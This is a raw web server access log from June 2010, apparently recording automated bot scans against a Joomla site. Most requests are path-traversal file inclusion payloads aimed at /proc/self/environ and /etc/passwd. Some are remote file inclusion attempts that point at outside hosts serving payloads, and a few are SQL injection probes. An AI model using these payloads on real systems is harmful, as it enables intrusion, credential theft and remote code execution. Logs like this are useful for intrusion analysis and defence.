200.135.228.230 - - [10/Jun/2010:04:47:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.135.228.230 - - [10/Jun/2010:04:47:35 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
202.190.174.181 - - [10/Jun/2010:04:48:17 -0500] "GET /logs/access_log.1274572800%20%20//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
95.156.233.139 - - [10/Jun/2010:04:48:48 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
95.156.233.139 - - [10/Jun/2010:04:48:48 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
95.156.233.139 - - [10/Jun/2010:04:48:48 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [10/Jun/2010:04:48:48 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.111.176.22 - - [10/Jun/2010:04:51:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
95.156.233.139 - - [10/Jun/2010:04:51:58 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
95.156.233.139 - - [10/Jun/2010:04:51:58 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
207.46.199.201 - - [10/Jun/2010:04:53:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [10/Jun/2010:04:54:24 -0500] "GET /logs/access_log.1219795200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.135.228.230 - - [10/Jun/2010:04:54:51 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.200.169.108 - - [10/Jun/2010:04:55:28 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:55:29 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:55:30 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:55:30 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:55:32 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:55:32 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.31.116.11 - - [10/Jun/2010:04:56:15 -0500] "GET /logs/access_log.1274572800/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 316 "-""libwww-perl/5.832"
206.123.118.132 - - [10/Jun/2010:04:56:17 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [10/Jun/2010:04:56:17 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [10/Jun/2010:04:56:18 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
89.31.116.11 - - [10/Jun/2010:04:56:18 -0500] "GET /*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 289 "-""libwww-perl/5.832"
206.123.118.132 - - [10/Jun/2010:04:56:18 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.31.116.11 - - [10/Jun/2010:04:56:21 -0500] "GET /logs/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 294 "-""libwww-perl/5.832"
206.123.118.132 - - [10/Jun/2010:04:56:21 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [10/Jun/2010:04:56:21 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.13.143 - - [10/Jun/2010:04:59:09 -0500] "GET /logs/access_log.1193270400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.200.169.108 - - [10/Jun/2010:04:59:51 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:59:51 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:59:53 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:59:53 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:59:57 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:59:58 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:59:59 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:59:59 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:59:59 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:00:00 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:00:00 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:00:00 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.203.68.45 - - [10/Jun/2010:05:00:04 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:05:00:04 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
209.200.244.57 - - [10/Jun/2010:05:00:10 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.805"
209.200.244.57 - - [10/Jun/2010:05:00:10 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:00:10 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:00:10 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:00:11 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:00:11 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:00:14 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:00:14 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.55.146.140 - - [10/Jun/2010:05:00:22 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.810"
72.55.146.140 - - [10/Jun/2010:05:00:22 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:05:00:38 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:05:00:38 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [10/Jun/2010:05:00:46 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.810"
89.31.116.11 - - [10/Jun/2010:05:00:48 -0500] "GET /logs/access_log.1274832000/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 316 "-""libwww-perl/5.832"
209.200.244.57 - - [10/Jun/2010:05:00:48 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.805"
91.203.68.45 - - [10/Jun/2010:05:00:53 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:05:00:54 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.170.45.162 - - [10/Jun/2010:05:00:54 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:00:54 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:01:05 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:01:06 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:01:09 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:01:10 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:01:10 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:01:10 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
72.55.146.140 - - [10/Jun/2010:05:01:11 -0500] "GET /logs/access_log.1274572800/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.810"
72.55.146.140 - - [10/Jun/2010:05:01:11 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.810"
72.55.146.140 - - [10/Jun/2010:05:01:11 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.810"
209.200.244.57 - - [10/Jun/2010:05:01:24 -0500] "GET /logs/access_log.1274572800/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.805"
209.200.244.57 - - [10/Jun/2010:05:01:24 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.805"
209.200.244.57 - - [10/Jun/2010:05:01:24 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.805"
72.55.146.140 - - [10/Jun/2010:05:01:31 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.810"
209.200.244.57 - - [10/Jun/2010:05:01:39 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.805"
79.170.45.162 - - [10/Jun/2010:05:01:53 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:01:53 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:02:00 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:02:00 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:02:11 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:02:12 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:02:28 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:02:28 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
209.200.244.57 - - [10/Jun/2010:05:02:30 -0500] "GET /logs/access_log.1274572800/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.805"
209.200.244.57 - - [10/Jun/2010:05:02:30 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.805"
209.200.244.57 - - [10/Jun/2010:05:02:30 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.805"
207.46.13.90 - - [10/Jun/2010:05:02:38 -0500] "GET /logs/access_log.1228780800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.200.244.57 - - [10/Jun/2010:05:02:44 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.805"
89.31.116.11 - - [10/Jun/2010:05:02:58 -0500] "GET /logs/access_log.1274832000/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:05:03:02 -0500] "GET /*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:05:03:06 -0500] "GET /logs/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 294 "-""libwww-perl/5.832"
91.203.68.45 - - [10/Jun/2010:05:03:21 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:05:03:21 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:05:03:21 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:05:04:08 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:05:04:08 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:05:04:08 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
89.31.116.11 - - [10/Jun/2010:05:04:10 -0500] "GET /logs/access_log.1274832000/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:05:04:12 -0500] "GET /*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:05:04:15 -0500] "GET /logs/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 294 "-""libwww-perl/5.832"
208.110.132.7 - - [10/Jun/2010:05:04:30 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.110.132.7 - - [10/Jun/2010:05:04:30 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.110.132.7 - - [10/Jun/2010:05:04:54 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.111.176.22 - - [10/Jun/2010:05:04:59 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.111.176.22 - - [10/Jun/2010:05:04:59 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.111.176.22 - - [10/Jun/2010:05:04:59 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
208.110.132.7 - - [10/Jun/2010:05:05:00 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.200.169.108 - - [10/Jun/2010:05:05:23 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:05:24 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:05:29 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:05:30 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:05:30 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:05:05:30 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.73.239.8 - - [10/Jun/2010:05:05:42 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:05:05:43 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.807"
208.86.186.246 - - [10/Jun/2010:05:06:07 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
208.86.186.246 - - [10/Jun/2010:05:06:07 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.834"
89.145.108.230 - - [10/Jun/2010:05:06:22 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
89.145.108.230 - - [10/Jun/2010:05:06:23 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
69.10.135.205 - - [10/Jun/2010:05:06:31 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.10.135.205 - - [10/Jun/2010:05:06:31 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.10.135.205 - - [10/Jun/2010:05:06:31 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
79.170.45.162 - - [10/Jun/2010:05:06:40 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:05:06:40 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
69.10.135.205 - - [10/Jun/2010:05:06:41